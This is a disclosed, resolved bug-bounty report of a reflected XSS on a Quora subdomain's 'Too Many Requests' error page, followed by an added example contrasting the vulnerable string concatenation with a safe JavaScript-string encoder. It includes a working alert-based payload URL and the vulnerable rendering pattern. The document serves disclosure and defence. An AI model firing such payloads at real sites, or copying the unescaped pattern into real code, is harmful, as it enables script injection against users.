[controlsyou.quora.com] 429 Too Many Requests Error-Page XSS

Disclosed: 2017-03-31 19:35:43 By bobrov To quora
Medium
Vulnerability Details
**Summary:** XSS on the error page when the user makes too many requests.

### Steps To Reproduce

1. Make a lot of requests to get the error 429
2. Open PoC in Firefox

```
https://controlsyou.quora.com/'-alert(document.domain)-'
```

**HTTP Response**

```
<script type="text/javascript">
...
ga('set', 'dimension1', 'board-'-alert(document.domain)-'');
ga('set', 'dimension2', 'False');
ga('set', 'dimension3', 'False');});});</script>
```

### Optional: Your Environment (Browser version, Device, app version, os version etc)

Tested on Firefox 50.0.2
Report Stats
  • Report ID: 189768
  • State: Closed
  • Substate: resolved
  • Upvotes: 17
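
The HTTP response in the report shows the path segment reflected inside a single-quoted JavaScript string literal in an inline script. The following is an added example, not part of the report and not Quora's code: it contrasts that concatenation pattern with an encoder for the script-string context. The function names, the stubbed `ga`/`alert`/`document` harness and the domain `example.test` are assumptions for illustration.

```javascript
// Added illustration; all names here are hypothetical.
// Path segment taken from the PoC URL in the report.
const POC_PATH = "'-alert(document.domain)-'";

// Reflects the pattern visible in the HTTP response: the value is pasted
// between single quotes, so a quote inside the value ends the literal.
function renderVulnerable(boardName) {
  return "ga('set', 'dimension1', 'board-" + boardName + "');";
}

// Encode a value as a JS string literal that is safe inside <script>:
// JSON.stringify handles quotes, backslashes and control characters; the
// replace also escapes ', <, >, & (blocks </script> and HTML-comment tricks)
// and U+2028/U+2029 (line terminators in pre-ES2019 engines).
function jsStringLiteral(value) {
  return JSON.stringify(String(value)).replace(
    /[<>&'\u2028\u2029]/g,
    (c) => "\\u" + c.charCodeAt(0).toString(16).padStart(4, "0")
  );
}

function renderHardened(boardName) {
  return "ga('set', 'dimension1', " + jsStringLiteral("board-" + boardName) + ");";
}

// Evaluate one rendered statement with stubbed globals and report what the
// page script would have done: the ga() arguments and whether alert() ran.
function runSnippet(statement) {
  const result = { args: null, alertCalls: 0 };
  const ga = (...args) => { result.args = args; };
  const alertStub = () => { result.alertCalls += 1; return 0; };
  const documentStub = { domain: "example.test" }; // constructed value
  new Function("ga", "alert", "document", statement)(ga, alertStub, documentStub);
  return result;
}

function demo() {
  return {
    vulnerable: runSnippet(renderVulnerable(POC_PATH)),
    hardened: runSnippet(renderHardened(POC_PATH)),
  };
}

console.log(renderVulnerable(POC_PATH));
console.log(renderHardened(POC_PATH));
console.log(demo());
```

With the encoder, the third `ga` argument is the original string and the stubbed `alert` is never reached; with plain concatenation the value is parsed as an expression.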